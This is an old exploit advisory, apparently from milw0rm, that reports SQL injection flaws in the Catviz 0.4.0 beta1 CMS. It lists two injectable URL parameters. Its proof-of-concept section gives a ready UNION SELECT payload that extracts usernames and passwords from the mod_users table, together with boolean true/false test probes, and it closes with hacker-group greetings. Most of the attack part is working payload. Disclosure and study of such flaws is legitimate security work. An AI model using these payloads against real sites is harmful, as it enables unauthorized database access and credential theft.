###################### # #Catviz 0.4.0 beta1 SQL Injection Vulnerability # ###################### # #Bug by: h0yt3r # #Dork: n/a # #Homepage: catviz.sourceforge.net # ## ### ## # #This CMS suffers from some not correctly verified variables which are used in SQL Querys. #An Attacker can easily get sensitive information from the database by injecting unexpected SQL Querys. # #SQL Injection: #http://[target]/[path]/index.php?module=news&news_op=form&form_name=article&form_action=show&foreign_key_value=[SQL] #http://[target]/[path]/index.php?webpages_form=webpage_multi_edit&webpage=[SQL] # #PoC: #index.php?module=news&news_op=form&form_name=article&form_action=show&foreign_key_value=10 union select 1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 from mod_users/* #index.php?webpages_form=webpage_multi_edit&webpage=26 and%201=1 #index.php?webpages_form=webpage_multi_edit&webpage=26 and%201=0 # # #You get "Go away you nasty intruder wannabe." when you do a wrong login... # # ####################### # #Greetz to thund3r, b!zZ!t, haZl0oh, WhiT€ $h@Dow, $h4d0wl33t, codeblu815, ramon, Free-Hack and Sys-Flaw and h4ck-y0u. # # ####################### ####################### # milw0rm.com [2008-06-30]